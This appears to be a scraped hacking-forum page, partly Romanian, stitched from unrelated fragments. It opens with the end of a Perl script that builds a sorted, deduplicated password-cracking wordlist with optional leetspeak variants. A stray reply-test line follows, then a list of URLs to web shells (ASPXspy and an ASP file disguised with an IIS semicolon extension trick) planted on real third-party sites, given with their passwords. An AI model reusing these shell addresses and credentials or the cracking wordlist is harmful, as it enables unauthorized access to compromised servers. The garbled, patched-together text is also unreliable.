# dir listing used if ($use_dir) { opendir(DIRTXT,$txt_dir) or die "Can't access " . $txt_dir . "\n"; foreach (readdir(DIRTXT)){ push(@rawfiles, $txt_dir . $_); } closedir (DIRTXT); } # iterate through each text file to be parsed # ignore this prog and hidden files via regex foreach $raw_dict (@rawfiles) { # no need to process these # regex out hidden files as such: /. if(($raw_dict eq ".") || ($raw_dict eq "..") || ($raw_dict =~ "generateDictionary.pl") || ($raw_dict =~ m/\/\./)) { next; } # strip start and end white space $raw_dict =~ s/^\s+//; $raw_dict =~ s/\s+$//; #increment file counter $fcounter++; open(RAWDICT,$raw_dict) or die "Can't open input file $raw_dict\n"; while ($var=<RAWDICT>) { $var =~ s/^\s+//; $var =~ s/\s+$//; if ((length($var) <= $max) && (length($var) >= $min)) { if($var) { if (($use_l33t) && ($use_mix)) { $count{join("",text231337($var))}++; $count{$var}++; } elsif (($use_l33t) && (!$use_mix)) { $count{join("",text231337($var))}++; } else { $count{$var}++; } } } } close (RAWDICT); } # perl hashes enforce uniqueness and sort for us foreach $key (sort keys %count) { print FINALDICT "$key\n"; $counter++; } print "\nYour sorted unique dictionary consists of data from " . $fcounter . " raw files, is located in file \"" . $fout . "\" and has " . $counter . " items in it ...\n\n"; close (FINALDICT); Mirror

reply test . Edit: Reply-urile de pe prima pagina nu apar

ASPXspy pass:admin http://www.ju.edu.jo/Lists/Inspectio...33/as.jar.aspx pass:admin ? - ?? http://www.waitan8hao.com/Upload/xm.asp;1%281%29.jpg China Hacker:6966551 sursa: rootarea